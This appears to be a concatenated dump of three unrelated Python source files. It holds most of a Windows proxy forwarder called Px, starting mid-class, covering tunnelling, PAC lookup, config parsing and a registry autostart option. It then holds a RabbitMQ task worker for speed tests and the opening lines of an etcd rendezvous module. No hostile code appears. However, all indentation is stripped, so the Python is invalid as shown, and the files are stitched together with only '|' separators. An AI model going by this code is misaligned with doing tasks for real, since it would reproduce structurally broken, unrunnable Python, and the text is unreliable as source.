def do_CONNECT(self):
dprint("Entering")
cl = 0
cs = 0
resp = self.do_transaction()
if resp.code >= 400:
dprint("Error %d" % resp.code)
self.send_error(resp.code)
else:
# Proxy connection may be already closed due to header (Proxy-)Connection: close
# received from proxy -> forward this to the client
if self.proxy_socket is None:
dprint("Proxy connection closed")
self.send_response(200, "True")
self.send_header("Proxy-Connection", "close")
self.end_headers()
else:
dprint("Tunneling through proxy")
self.send_response(200, "Connection established")
self.send_header("Proxy-Agent", self.version_string())
self.end_headers()
# sockets will be removed from these lists, when they are detected as closed by remote host;
# wlist contains sockets only when data has to be written
rlist = [self.connection, self.proxy_socket]
wlist = []
# data to be written to client connection and proxy socket respectively
cdata = []
sdata = []
idle = State.config.getint("settings", "idle")
max_idle = time.time() + idle
while not State.exit and (rlist or wlist):
(ins, outs, exs) = select.select(rlist, wlist, rlist, idle)
if exs:
break
if ins:
for i in ins:
if i is self.proxy_socket:
out = self.connection
wdata = cdata
source = "proxy"
else:
out = self.proxy_socket
wdata = sdata
source = "client"
data = i.recv(4096)
if data:
cl += len(data)
# Prepare data to send it later in the outs section
wdata.append(data)
if out not in outs:
outs.append(out)
max_idle = time.time() + idle
else:
# No data means connection closed by remote host
dprint("Connection closed by %s" % source)
# Because tunnel is closed on one end there is no need to read from both ends
rlist.clear()
# Do not write anymore to the closed end
if i in wlist:
wlist.remove(i)
if i in outs:
outs.remove(i)
if outs:
for o in outs:
if o is self.proxy_socket:
wdata = sdata
else:
wdata = cdata
data = wdata[0]
# socket.send() may sending only a part of the data (as documentation says).
# To ensure sending all data
bsnt = o.send(data)
if bsnt > 0:
if bsnt < len(data):
# Not all data was sent; store data not sent and ensure select() get's it
# when the socket can be written again
wdata[0] = data[bsnt:]
if o not in wlist:
wlist.append(o)
else:
wdata.pop(0)
if not data and o in wlist:
wlist.remove(o)
cs += bsnt
else:
dprint("No data sent")
max_idle = time.time() + idle
if max_idle < time.time():
# No data in timeout seconds
dprint("Proxy connection timeout")
break
# After serving the proxy tunnel it could not be used for samething else.
# A proxy doesn't really know, when a proxy tunnnel isn't needed any more (there is no content length for data).
# So servings will be ended either after timeout seconds without data transfer or
# when at least one side closes the connection.
# Close both proxy and client connection if still open.
if self.proxy_socket is not None:
dprint("Cleanup proxy connection")
self.proxy_socket.close()
self.proxy_socket = None
self.close_connection = True
dprint("%d bytes read, %d bytes written" % (cl, cs))
dprint("Done")
def fwd_data(self, resp, flush=False):
cl = resp.length
dprint("Reading response data")
if resp.body:
if cl:
dprint("Content length %d" % cl)
while cl > 0:
if cl > 4096:
l = 4096
cl -= l
else:
l = cl
cl = 0
d = self.proxy_fp.read(l)
if not flush:
self.wfile.write(d)
elif resp.chunked:
dprint("Chunked encoding")
while not State.exit:
line = self.proxy_fp.readline(State.max_line)
if not flush:
self.wfile.write(line)
line = line.decode("utf-8").strip()
if not len(line):
dprint("Blank chunk size")
break
else:
try:
csize = int(line, 16) + 2
dprint("Chunk of size %d" % csize)
except ValueError:
dprint("Bad chunk size '%s'" % line)
continue
d = self.proxy_fp.read(csize)
if not flush:
self.wfile.write(d)
if csize == 2:
dprint("No more chunks")
break
if len(d) < csize:
dprint("Chunk size doesn't match data")
break
elif resp.data is not None:
dprint("Sending data string")
if not flush:
self.wfile.write(resp.data)
else:
dprint("Not sure how much")
while not State.exit:
time.sleep(0.1)
d = self.proxy_fp.read(1024)
if not flush:
self.wfile.write(d)
if len(d) < 1024:
break
if resp.close and self.proxy_socket:
dprint("Close proxy connection per header")
self.proxy_socket.close()
self.proxy_socket = None
def fwd_resp(self, resp):
dprint("Entering")
self.send_response(resp.code)
for header in resp.headers:
dprint("Returning %s: %s" % (header[0], header[1]))
self.send_header(header[0], header[1])
self.end_headers()
self.fwd_data(resp)
dprint("Done")
def get_destination(self):
netloc = self.path
path = "/"
if self.command != "CONNECT":
parse = urlparse.urlparse(self.path, allow_fragments=False)
if parse.netloc:
netloc = parse.netloc
if ":" not in netloc:
port = parse.port
if not port:
if parse.scheme == "http":
port = 80
elif parse.scheme == "https":
port = 443
elif parse.scheme == "ftp":
port = 21
netloc = netloc + ":" + str(port)
path = parse.path or "/"
if parse.params:
path = path + ";" + parse.params
if parse.query:
path = path + "?" + parse.query
dprint(netloc)
# Check destination for noproxy first, before doing any expensive stuff
# possibly involving connections
if State.noproxy.size:
addr = []
spl = netloc.split(":", 1)
try:
addr = socket.getaddrinfo(spl[0], int(spl[1]))
except socket.gaierror:
# Couldn't resolve, let parent proxy try, #18
dprint("Couldn't resolve host")
if len(addr) and len(addr[0]) == 5:
ipport = addr[0][4]
dprint("%s => %s + %s" % (self.path, ipport, path))
if ipport[0] in State.noproxy:
dprint("Direct connection from noproxy configuration")
self.path = path
return ipport
# Get proxy mode and servers straight from load_proxy to avoid
# threading issues
(proxy_mode, self.proxy_servers) = load_proxy()
if proxy_mode in [MODE_AUTO, MODE_PAC]:
proxy_str = find_proxy_for_url(
("https://" if "://" not in self.path else "") + self.path)
if proxy_str == "DIRECT":
ipport = netloc.split(":")
ipport[1] = int(ipport[1])
dprint("Direct connection from PAC")
self.path = path
return tuple(ipport)
if proxy_str:
dprint("Proxy from PAC = " + str(proxy_str))
# parse_proxy does not modify State.proxy_server any more,
# it returns the proxy server tuples instead, because proxy_str
# contains only the proxy servers for the URL served by this thread
self.proxy_servers = parse_proxy(proxy_str)
return True if self.proxy_servers else False
###
# Multi-processing and multi-threading
def get_host_ips():
localips = [ip[4][0] for ip in socket.getaddrinfo(socket.gethostname(), 80, socket.AF_INET)]
localips.insert(0, "127.0.0.1")
return localips
class PoolMixIn(socketserver.ThreadingMixIn):
def process_request(self, request, client_address):
self.pool.submit(self.process_request_thread, request, client_address)
def verify_request(self, request, client_address):
dprint("Client address: %s" % client_address[0])
if client_address[0] in State.allow:
return True
if State.hostonly and client_address[0] in get_host_ips():
dprint("Host-only IP allowed")
return True
dprint("Client not allowed: %s" % client_address[0])
return False
class ThreadedTCPServer(PoolMixIn, socketserver.TCPServer):
daemon_threads = True
allow_reuse_address = True
def __init__(self, server_address, RequestHandlerClass, bind_and_activate=True):
socketserver.TCPServer.__init__(self, server_address,
RequestHandlerClass, bind_and_activate)
try:
# Workaround bad thread naming code in Python 3.6+, fixed in master
self.pool = concurrent.futures.ThreadPoolExecutor(
max_workers=State.config.getint("settings", "threads"),
thread_name_prefix="Thread")
except:
self.pool = concurrent.futures.ThreadPoolExecutor(
max_workers=State.config.getint("settings", "threads"))
def print_banner():
pprint("Serving at %s:%d proc %s" % (
State.config.get("proxy", "listen").strip(),
State.config.getint("proxy", "port"),
multiprocessing.current_process().name)
)
if getattr(sys, "frozen", False) != False or "pythonw.exe" in sys.executable:
if State.config.getint("settings", "foreground") == 0:
detach_console()
for section in State.config.sections():
for option in State.config.options(section):
dprint(section + ":" + option + " = " + State.config.get(section, option))
def serve_forever(httpd):
signal.signal(signal.SIGINT, signal.SIG_DFL)
try:
httpd.serve_forever()
except KeyboardInterrupt:
dprint("Exiting")
State.exit = True
httpd.shutdown()
def start_worker(pipeout):
parse_config()
httpd = ThreadedTCPServer(
(State.config.get("proxy", "listen").strip(), State.config.getint("proxy", "port")),
Proxy, bind_and_activate=False
)
mainsock = socket.fromshare(pipeout.recv())
httpd.socket = mainsock
print_banner()
serve_forever(httpd)
def run_pool():
try:
httpd = ThreadedTCPServer((State.config.get("proxy", "listen").strip(),
State.config.getint("proxy", "port")), Proxy)
except OSError as exc:
if "attempt was made" in str(exc):
print("Px failed to start - port in use")
else:
pprint(exc)
return
mainsock = httpd.socket
print_banner()
if hasattr(socket, "fromshare"):
workers = State.config.getint("settings", "workers")
for i in range(workers-1):
(pipeout, pipein) = multiprocessing.Pipe()
p = multiprocessing.Process(target=start_worker, args=(pipeout,))
p.daemon = True
p.start()
while p.pid is None:
time.sleep(1)
pipein.send(mainsock.share(p.pid))
serve_forever(httpd)
###
# Proxy detection
class WINHTTP_CURRENT_USER_IE_PROXY_CONFIG(ctypes.Structure):
_fields_ = [("fAutoDetect", ctypes.wintypes.BOOL), # "Automatically detect settings"
("lpszAutoConfigUrl", ctypes.wintypes.LPWSTR), # "Use automatic configuration script, Address"
("lpszProxy", ctypes.wintypes.LPWSTR), # "1.2.3.4:5" if "Use the same proxy server for all protocols",
# else advanced "ftp=1.2.3.4:5;http=1.2.3.4:5;https=1.2.3.4:5;socks=1.2.3.4:5"
("lpszProxyBypass", ctypes.wintypes.LPWSTR), # ";"-separated list, "Bypass proxy server for local addresses" adds "<local>"
]
class WINHTTP_AUTOPROXY_OPTIONS(ctypes.Structure):
_fields_ = [("dwFlags", ctypes.wintypes.DWORD),
("dwAutoDetectFlags", ctypes.wintypes.DWORD),
("lpszAutoConfigUrl", ctypes.wintypes.LPCWSTR),
("lpvReserved", ctypes.c_void_p),
("dwReserved", ctypes.wintypes.DWORD),
("fAutoLogonIfChallenged", ctypes.wintypes.BOOL), ]
class WINHTTP_PROXY_INFO(ctypes.Structure):
_fields_ = [("dwAccessType", ctypes.wintypes.DWORD),
("lpszProxy", ctypes.wintypes.LPCWSTR),
("lpszProxyBypass", ctypes.wintypes.LPCWSTR), ]
# Parameters for WinHttpOpen, http://msdn.microsoft.com/en-us/library/aa384098(VS.85).aspx
WINHTTP_NO_PROXY_NAME = 0
WINHTTP_NO_PROXY_BYPASS = 0
WINHTTP_FLAG_ASYNC = 0x10000000
# dwFlags values
WINHTTP_AUTOPROXY_AUTO_DETECT = 0x00000001
WINHTTP_AUTOPROXY_CONFIG_URL = 0x00000002
# dwAutoDetectFlags values
WINHTTP_AUTO_DETECT_TYPE_DHCP = 0x00000001
WINHTTP_AUTO_DETECT_TYPE_DNS_A = 0x00000002
# dwAccessType values
WINHTTP_ACCESS_TYPE_DEFAULT_PROXY = 0
WINHTTP_ACCESS_TYPE_NO_PROXY = 1
WINHTTP_ACCESS_TYPE_NAMED_PROXY = 3
WINHTTP_ACCESS_TYPE_AUTOMATIC_PROXY = 4
# Error messages
WINHTTP_ERROR_WINHTTP_UNABLE_TO_DOWNLOAD_SCRIPT = 12167
def winhttp_find_proxy_for_url(url, autodetect=False, pac_url=None, autologon=True):
# Fix issue #51
ACCESS_TYPE = WINHTTP_ACCESS_TYPE_AUTOMATIC_PROXY
if WIN_VERSION < 6.3:
ACCESS_TYPE = WINHTTP_ACCESS_TYPE_DEFAULT_PROXY
ctypes.windll.winhttp.WinHttpOpen.restype = ctypes.c_void_p
hInternet = ctypes.windll.winhttp.WinHttpOpen(
ctypes.wintypes.LPCWSTR("Px"),
ACCESS_TYPE, WINHTTP_NO_PROXY_NAME,
WINHTTP_NO_PROXY_BYPASS, WINHTTP_FLAG_ASYNC)
if not hInternet:
dprint("WinHttpOpen failed: " + str(ctypes.GetLastError()))
return ""
autoproxy_options = WINHTTP_AUTOPROXY_OPTIONS()
if pac_url:
autoproxy_options.dwFlags = WINHTTP_AUTOPROXY_CONFIG_URL
autoproxy_options.dwAutoDetectFlags = 0
autoproxy_options.lpszAutoConfigUrl = pac_url
elif autodetect:
autoproxy_options.dwFlags = WINHTTP_AUTOPROXY_AUTO_DETECT
autoproxy_options.dwAutoDetectFlags = WINHTTP_AUTO_DETECT_TYPE_DHCP | WINHTTP_AUTO_DETECT_TYPE_DNS_A
autoproxy_options.lpszAutoConfigUrl = 0
else:
return ""
autoproxy_options.fAutoLogonIfChallenged = autologon
proxy_info = WINHTTP_PROXY_INFO()
# Fix issue #43
ctypes.windll.winhttp.WinHttpGetProxyForUrl.argtypes = [ctypes.c_void_p,
ctypes.wintypes.LPCWSTR, ctypes.POINTER(WINHTTP_AUTOPROXY_OPTIONS),
ctypes.POINTER(WINHTTP_PROXY_INFO)]
ok = ctypes.windll.winhttp.WinHttpGetProxyForUrl(hInternet, ctypes.wintypes.LPCWSTR(url),
ctypes.byref(autoproxy_options), ctypes.byref(proxy_info))
if not ok:
error = ctypes.GetLastError()
dprint("WinHttpGetProxyForUrl error %s" % error)
if error == WINHTTP_ERROR_WINHTTP_UNABLE_TO_DOWNLOAD_SCRIPT:
dprint("Could not download PAC file, trying DIRECT instead")
return "DIRECT"
return ""
if proxy_info.dwAccessType == WINHTTP_ACCESS_TYPE_NAMED_PROXY:
# Note: proxy_info.lpszProxyBypass makes no sense here!
if not proxy_info.lpszProxy:
dprint('WinHttpGetProxyForUrl named proxy without name')
return ""
return proxy_info.lpszProxy.replace(" ", ",").replace(";", ",").replace(",DIRECT", "") # Note: We only see the first!
if proxy_info.dwAccessType == WINHTTP_ACCESS_TYPE_NO_PROXY:
return "DIRECT"
# WinHttpCloseHandle()
dprint("WinHttpGetProxyForUrl accesstype %s" % (proxy_info.dwAccessType,))
return ""
def file_url_to_local_path(file_url):
parts = urlparse.urlparse(file_url)
path = urlparse.unquote(parts.path)
if path.startswith('/') and not path.startswith('//'):
if len(parts.netloc) == 2 and parts.netloc[1] == ':':
return parts.netloc + path
return 'C:' + path
if len(path) > 2 and path[1] == ':':
return path
def load_proxy(quiet=False):
# Return if proxies specified in Px config
if State.proxy_mode == MODE_CONFIG:
return (State.proxy_mode, State.proxy_server)
# Do locking to avoid updating globally shared State object by multiple
# threads simultaneously
State.proxy_mode_lock.acquire()
try:
proxy_mode = State.proxy_mode
proxy_servers = State.proxy_server
# Check if need to refresh
if (State.proxy_refresh is not None and
time.time() - State.proxy_refresh <
State.config.getint("settings", "proxyreload")):
if not quiet:
dprint("Skip proxy refresh")
return (proxy_mode, proxy_servers)
# Start with clean proxy mode and server list
proxy_mode = MODE_NONE
proxy_servers = []
# Get proxy info from Internet Options
ie_proxy_config = WINHTTP_CURRENT_USER_IE_PROXY_CONFIG()
ok = ctypes.windll.winhttp.WinHttpGetIEProxyConfigForCurrentUser(ctypes.byref(ie_proxy_config))
if not ok:
if not quiet:
dprint(ctypes.GetLastError())
else:
if ie_proxy_config.fAutoDetect:
proxy_mode = MODE_AUTO
elif ie_proxy_config.lpszAutoConfigUrl:
State.pac = ie_proxy_config.lpszAutoConfigUrl
proxy_mode = MODE_PAC
if not quiet:
dprint("AutoConfigURL = " + State.pac)
else:
# Manual proxy
proxies = []
proxies_str = ie_proxy_config.lpszProxy or ""
for proxy_str in proxies_str.lower().replace(' ', ';').split(';'):
if '=' in proxy_str:
scheme, proxy = proxy_str.split('=', 1)
if scheme.strip() != "ftp":
proxies.append(proxy)
elif proxy_str:
proxies.append(proxy_str)
if proxies:
proxy_servers = parse_proxy(",".join(proxies))
proxy_mode = MODE_MANUAL
# Proxy exceptions into noproxy
bypass_str = ie_proxy_config.lpszProxyBypass or "" # FIXME: Handle "<local>"
bypasses = [h.strip() for h in bypass_str.lower().replace(' ', ';').split(';')]
for bypass in bypasses:
try:
ipns = netaddr.IPGlob(bypass)
State.noproxy.add(ipns)
if not quiet:
dprint("Noproxy += " + bypass)
except:
State.noproxy_hosts.append(bypass)
if not quiet:
dprint("Noproxy hostname += " + bypass)
State.proxy_refresh = time.time()
if not quiet:
dprint("Proxy mode = " + str(proxy_mode))
State.proxy_mode = proxy_mode
State.proxy_server = proxy_servers
# Clear proxy types on proxy server update
State.proxy_type = {}
finally:
State.proxy_mode_lock.release()
return (proxy_mode, proxy_servers)
def find_proxy_for_url(url):
proxy_str = ""
if State.proxy_mode == MODE_AUTO:
proxy_str = winhttp_find_proxy_for_url(url, autodetect=True)
elif State.proxy_mode == MODE_PAC:
pac = State.pac
if "file://" in State.pac:
host = State.config.get("proxy", "listen") or "localhost"
port = State.config.getint("proxy", "port")
pac = "http://%s:%d/PxPACFile.pac" % (host, port)
dprint("PAC URL is local: " + pac)
proxy_str = winhttp_find_proxy_for_url(url, pac_url=pac)
# Handle edge case if the result is a list that starts with DIRECT. Assume
# everything should be direct as the string DIRECT is tested explicitly in
# get_destination
if proxy_str.startswith("DIRECT,"):
proxy_str = "DIRECT"
dprint("Proxy found: " + proxy_str)
return proxy_str
###
# Parse settings and command line
def parse_proxy(proxystrs):
if not proxystrs:
return []
servers = []
for proxystr in [i.strip() for i in proxystrs.split(",")]:
pserver = [i.strip() for i in proxystr.split(":")]
if len(pserver) == 1:
pserver.append(80)
elif len(pserver) == 2:
try:
pserver[1] = int(pserver[1])
except ValueError:
pprint("Bad proxy server port: " + pserver[1])
sys.exit()
else:
pprint("Bad proxy server definition: " + proxystr)
sys.exit()
if tuple(pserver) not in servers:
servers.append(tuple(pserver))
return servers
def parse_ip_ranges(iprangesconfig):
ipranges = netaddr.IPSet([])
iprangessplit = [i.strip() for i in iprangesconfig.split(",")]
for iprange in iprangessplit:
if not iprange:
continue
try:
if "-" in iprange:
spl = iprange.split("-", 1)
ipns = netaddr.IPRange(spl[0], spl[1])
elif "*" in iprange:
ipns = netaddr.IPGlob(iprange)
else:
ipns = netaddr.IPNetwork(iprange)
ipranges.add(ipns)
except:
pprint("Bad IP definition: %s" % iprangesconfig)
sys.exit()
return ipranges
def parse_allow(allow):
State.allow = parse_ip_ranges(allow)
def parse_noproxy(noproxy):
State.noproxy = parse_ip_ranges(noproxy)
def set_useragent(useragent):
State.useragent = useragent
def set_username(username):
ud = username.split("\\")
if len(ud) == 2:
State.username = ud[1]
State.domain = ud[0]
else:
State.username = username
def cfg_int_init(section, name, default, override=False):
val = default
if not override:
try:
val = State.config.get(section, name).strip()
except configparser.NoOptionError:
pass
try:
val = int(val)
except ValueError:
pprint("Invalid integer value for " + section + ":" + name)
State.config.set(section, name, str(val))
def cfg_float_init(section, name, default, override=False):
val = default
if not override:
try:
val = State.config.get(section, name).strip()
except configparser.NoOptionError:
pass
try:
val = float(val)
except ValueError:
pprint("Invalid float value for " + section + ":" + name)
State.config.set(section, name, str(val))
def cfg_str_init(section, name, default, proc=None, override=False):
val = default
if not override:
try:
val = State.config.get(section, name).strip()
except configparser.NoOptionError:
pass
State.config.set(section, name, val)
if proc != None:
proc(val)
def save():
with open(State.ini, "w") as cfgfile:
State.config.write(cfgfile)
pprint("Saved config to " + State.ini + "\n")
with open(State.ini, "r") as cfgfile:
sys.stdout.write(cfgfile.read())
sys.exit()
def parse_config():
if "--debug" in sys.argv:
State.logger = Log(dfile(), "w")
if getattr(sys, "frozen", False) != False or "pythonw.exe" in sys.executable:
attach_console()
if "-h" in sys.argv or "--help" in sys.argv:
pprint(HELP)
sys.exit()
# Load configuration file
State.config = configparser.ConfigParser()
State.ini = os.path.join(os.path.dirname(get_script_path()), State.ini)
for i in range(len(sys.argv)):
if "=" in sys.argv[i]:
val = sys.argv[i].split("=")[1]
if "--config=" in sys.argv[i]:
State.ini = val
if not os.path.exists(val) and "--save" not in sys.argv:
pprint("Could not find config file: " + val)
sys.exit()
if os.path.exists(State.ini):
State.config.read(State.ini)
# [proxy] section
if "proxy" not in State.config.sections():
State.config.add_section("proxy")
cfg_str_init("proxy", "server", "")
cfg_int_init("proxy", "port", "3128")
cfg_str_init("proxy", "listen", "127.0.0.1")
cfg_str_init("proxy", "allow", "*.*.*.*", parse_allow)
cfg_int_init("proxy", "gateway", "0")
cfg_int_init("proxy", "hostonly", "0")
cfg_str_init("proxy", "noproxy", "", parse_noproxy)
cfg_str_init("proxy", "useragent", "", set_useragent)
cfg_str_init("proxy", "username", "", set_username)
# [settings] section
if "settings" not in State.config.sections():
State.config.add_section("settings")
cfg_int_init("settings", "workers", "2")
cfg_int_init("settings", "threads", "5")
cfg_int_init("settings", "idle", "30")
cfg_float_init("settings", "socktimeout", "20.0")
cfg_int_init("settings", "proxyreload", "60")
cfg_int_init("settings", "foreground", "0")
cfg_int_init("settings", "log", "0" if State.logger is None else "1")
if State.config.get("settings", "log") == "1" and State.logger is None:
State.logger = Log(dfile(), "w")
# Command line flags
for i in range(len(sys.argv)):
if "=" in sys.argv[i]:
val = sys.argv[i].split("=")[1]
if "--proxy=" in sys.argv[i] or "--server=" in sys.argv[i]:
cfg_str_init("proxy", "server", val, None, True)
elif "--listen=" in sys.argv[i]:
cfg_str_init("proxy", "listen", val, None, True)
elif "--port=" in sys.argv[i]:
cfg_int_init("proxy", "port", val, True)
elif "--allow=" in sys.argv[i]:
cfg_str_init("proxy", "allow", val, parse_allow, True)
elif "--noproxy=" in sys.argv[i]:
cfg_str_init("proxy", "noproxy", val, parse_noproxy, True)
elif "--useragent=" in sys.argv[i]:
cfg_str_init("proxy", "useragent", val, set_useragent, True)
elif "--username=" in sys.argv[i]:
cfg_str_init("proxy", "username", val, set_username, True)
else:
for j in ["workers", "threads", "idle", "proxyreload"]:
if "--" + j + "=" in sys.argv[i]:
cfg_int_init("settings", j, val, True)
for j in ["socktimeout"]:
if "--" + j + "=" in sys.argv[i]:
cfg_float_init("settings", j, val, True)
if "--gateway" in sys.argv:
cfg_int_init("proxy", "gateway", "1", True)
if "--hostonly" in sys.argv:
cfg_int_init("proxy", "hostonly", "1", True)
if "--foreground" in sys.argv:
cfg_int_init("settings", "foreground", "1", True)
###
# Dependency propagation
# If gateway mode
if State.config.getint("proxy", "gateway") == 1:
# Listen on all interfaces
cfg_str_init("proxy", "listen", "", None, True)
# If hostonly mode
if State.config.getint("proxy", "hostonly") == 1:
State.hostonly = True
# Listen on all interfaces
cfg_str_init("proxy", "listen", "", None, True)
# If not gateway mode or gateway with default allow rules
if (State.config.getint("proxy", "gateway") == 0 or
(State.config.getint("proxy", "gateway") == 1 and
State.config.get("proxy", "allow") in ["*.*.*.*", "0.0.0.0/0"])):
# Purge allow rules
cfg_str_init("proxy", "allow", "", parse_allow, True)
State.proxy_server = parse_proxy(State.config.get("proxy", "server"))
if "--install" in sys.argv:
install()
elif "--uninstall" in sys.argv:
uninstall()
elif "--quit" in sys.argv:
quit()
elif "--save" in sys.argv:
save()
if State.proxy_server:
State.proxy_mode = MODE_CONFIG
else:
load_proxy(quiet=True)
if State.proxy_mode == MODE_NONE and not State.config.get("proxy", "noproxy"):
pprint("No proxy server or noproxy list defined")
sys.exit()
socket.setdefaulttimeout(State.config.getfloat("settings", "socktimeout"))
###
# Exit related
def quit(force=False):
count = 0
mypids = [os.getpid(), os.getppid()]
for pid in sorted(psutil.pids(), reverse=True):
if pid in mypids:
continue
try:
p = psutil.Process(pid)
if p.exe().lower() == sys.executable.lower():
count += 1
if force:
p.kill()
else:
p.send_signal(signal.CTRL_C_EVENT)
except (psutil.AccessDenied, psutil.NoSuchProcess, PermissionError, SystemError):
pass
except:
traceback.print_exc(file=sys.stdout)
if count != 0:
if force:
sys.stdout.write(".")
else:
sys.stdout.write("Quitting Px ..")
time.sleep(4)
sys.stdout.flush()
quit(True)
else:
if force:
pprint(" DONE")
else:
pprint("Px is not running")
sys.exit()
def handle_exceptions(extype, value, tb):
# Create traceback log
lst = traceback.format_tb(tb, None) + traceback.format_exception_only(extype, value)
tracelog = '\nTraceback (most recent call last):\n' + "%-20s%s\n" % ("".join(lst[:-1]), lst[-1])
if State.logger != None:
pprint(tracelog)
else:
sys.stderr.write(tracelog)
# Save to debug.log
dbg = open(dfile(), 'w')
dbg.write(tracelog)
dbg.close()
###
# Install Px to startup
def get_script_path():
if getattr(sys, "frozen", False) is False:
# Script mode
return os.path.normpath(os.path.join(os.getcwd(), sys.argv[0]))
# Frozen mode
return sys.executable
def get_script_cmd():
spath = get_script_path()
if os.path.splitext(spath)[1].lower() == ".py":
return sys.executable + ' "%s"' % spath
return spath
def check_installed():
ret = True
runkey = winreg.OpenKey(winreg.HKEY_CURRENT_USER, r"Software\Microsoft\Windows\CurrentVersion\Run", 0, winreg.KEY_READ)
try:
winreg.QueryValueEx(runkey, "Px")
except:
ret = False
winreg.CloseKey(runkey)
return ret
def install():
if check_installed() is False:
runkey = winreg.OpenKey(winreg.HKEY_CURRENT_USER, r"Software\Microsoft\Windows\CurrentVersion\Run", 0, winreg.KEY_WRITE)
winreg.SetValueEx(runkey, "Px", 0, winreg.REG_EXPAND_SZ, get_script_cmd())
winreg.CloseKey(runkey)
pprint("Px installed successfully")
else:
pprint("Px already installed")
sys.exit()
def uninstall():
if check_installed() is True:
runkey = winreg.OpenKey(winreg.HKEY_CURRENT_USER, r"Software\Microsoft\Windows\CurrentVersion\Run", 0, winreg.KEY_WRITE)
winreg.DeleteValue(runkey, "Px")
winreg.CloseKey(runkey)
pprint("Px uninstalled successfully")
else:
pprint("Px is not installed")
sys.exit()
###
# Attach/detach console
def attach_console():
if ctypes.windll.kernel32.GetConsoleWindow() != 0:
dprint("Already attached to a console")
return
# Find parent cmd.exe if exists
pid = os.getpid()
while True:
try:
p = psutil.Process(pid)
except psutil.NoSuchProcess:
# No such parent - started without console
pid = -1
break
if os.path.basename(p.name()).lower() in ["cmd", "cmd.exe", "powershell", "powershell.exe"]:
# Found it
break
# Search parent
pid = p.ppid()
# Not found, started without console
if pid == -1:
dprint("No parent console to attach to")
return
dprint("Attaching to console " + str(pid))
if ctypes.windll.kernel32.AttachConsole(pid) == 0:
dprint("Attach failed with error " + str(ctypes.windll.kernel32.GetLastError()))
return
if ctypes.windll.kernel32.GetConsoleWindow() == 0:
dprint("Not a console window")
return
reopen_stdout()
def detach_console():
if ctypes.windll.kernel32.GetConsoleWindow() == 0:
return
restore_stdout()
if not ctypes.windll.kernel32.FreeConsole():
dprint("Free console failed with error " + str(ctypes.windll.kernel32.GetLastError()))
else:
dprint("Freed console successfully")
###
# Startup
def main():
multiprocessing.freeze_support()
sys.excepthook = handle_exceptions
parse_config()
run_pool()
if __name__ == "__main__":
main()
|
transit_search_worker_v1.py
|
#!../../../../datadir_local/virtualenv/bin/python3
# -*- coding: utf-8 -*-
# transit_search_worker_v1.py
"""
Run speed tests as requested through the RabbitMQ message queue
This version receives all messages via a single connecion to the message queue, which is vulnerable to timing out
See:
https://stackoverflow.com/questions/14572020/handling-long-running-tasks-in-pika-rabbitmq/52951933#52951933
https://github.com/pika/pika/blob/0.12.0/examples/basic_consumer_threaded.py
"""
import functools
import json
import logging
import os
import threading
import time
import traceback
import argparse
import pika
from pika.exceptions import AMQPConnectionError
from plato_wp36 import settings, task_runner
from plato_wp36.results_logger import ResultsToRabbitMQ
def acknowledge_message(channel, delivery_tag):
"""
Acknowledge receipt of a RabbitMQ message, thereby preventing it from being sent to other worker nodes.
"""
channel.basic_ack(delivery_tag=delivery_tag)
def do_work(connection=None, channel=None, delivery_tag=None, body='[{"task":"null"}]'):
"""
Perform a list of tasks sent to us via a RabbitMQ message
"""
# Make sure we return to working directory after handling any exceptions
cwd = os.getcwd()
# Extract list of the jobs we are to do
job_descriptor = json.loads(body)
# Define results target
results_target = "rabbitmq"
# Instantiate worker
worker = task_runner.TaskRunner(results_target=results_target)
try:
# Check that job description is a dictionary
if not isinstance(job_descriptor, dict):
bad_message = job_descriptor
job_descriptor = {'job_name': 'untitled'}
raise ValueError("Bad message was not a dictionary: <{}>".format(bad_message))
# Do requested task
worker.do_work(job_name=job_descriptor.get('job_name', 'untitled'),
job_parameters=job_descriptor.get('job_parameters', {}),
clean_up_products=job_descriptor.get('clean_up', True),
task_list=job_descriptor['task_list'],
)
except Exception:
error_message = traceback.format_exc()
result_log = ResultsToRabbitMQ(results_target=results_target)
# File result to message queue
result_log.record_result(job_name=job_descriptor['job_name'],
parameters=job_descriptor.get('job_parameters', {}),
task_name='error_message', timestamp=time.time(),
result=error_message)
finally:
os.chdir(cwd)
# Acknowledge the message we've just processed
if connection is not None:
cb = functools.partial(acknowledge_message, channel, delivery_tag)
connection.add_callback_threadsafe(cb)
def message_callback(channel, method_frame, properties, body, args):
"""
Callback function called by RabbitMQ when we receive a message telling us to do some work.
"""
(connection, threads) = args
logging.info("--> Received {}".format(body))
delivery_tag = method_frame.delivery_tag
t = threading.Thread(target=do_work, args=(connection, channel, delivery_tag, body))
t.start()
threads.append(t)
def run_worker_tasks(broker="amqp://guest:guest@rabbitmq-service:5672", queue="tasks"):
"""
Set up a RabbitMQ consumer to call the <message_callback> function whenever we receive a message
telling us to do some work.
"""
while True:
try:
connection = pika.BlockingConnection(pika.URLParameters(url=broker))
channel = connection.channel()
channel.basic_qos(prefetch_count=1)
channel.queue_declare(queue=queue)
threads = []
on_message_callback = functools.partial(message_callback, args=(connection, threads))
channel.basic_consume(queue=queue, on_message_callback=on_message_callback)
logging.info('Waiting for messages. To exit press CTRL+C')
channel.start_consuming()
except AMQPConnectionError:
logging.info("AMPQ connection failure")
time.sleep(30)
if __name__ == "__main__":
# Read command-line arguments
parser = argparse.ArgumentParser(description=__doc__)
args = parser.parse_args()
# Set up logging
log_file_path = os.path.join(settings.settings['dataPath'], 'plato_wp36.log')
logging.basicConfig(level=logging.INFO,
format='[%(asctime)s] %(levelname)s:%(filename)s:%(message)s',
datefmt='%d/%m/%Y %H:%M:%S',
handlers=[
logging.FileHandler(log_file_path),
logging.StreamHandler()
])
logger = logging.getLogger(__name__)
logger.info(__doc__.strip())
# Enter infinite loop of listening for RabbitMQ messages telling us to do work
run_worker_tasks()
|
etcd_rendezvous.py
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
import datetime
import json
import logging
import random
import sys
import threading
import time
from base64 import b64decode, b64encode
from typing import Optional
import etcd
from torch.distributed import Store, TCPStore, register_rendezvous_handler
from torchelastic.rendezvous import (
RendezvousClosedException,
RendezvousHandler,
RendezvousNonRetryableError,
RendezvousTimeoutException,
)
_log_fmt = logging.Formatter("%(levelname)s %(asctime)s %(message)s")
_log_handler = logging.StreamHandler(sys.stderr)
_log_handler.setFormatter(_log_fmt)
log = logging.getLogger(__name__)
log.propagate = False
log.setLevel(logging.INFO)
log.addHandler(_log_handler)
# Retryable failure exception means the we were too late to make
# a desired state transition (e.g. because of a race condition),
# and should now restart from the beginning.
# A small delay is recommended to avoid spamming Etcd.
class EtcdRendezvousRetryableFailure(Exception):
pass
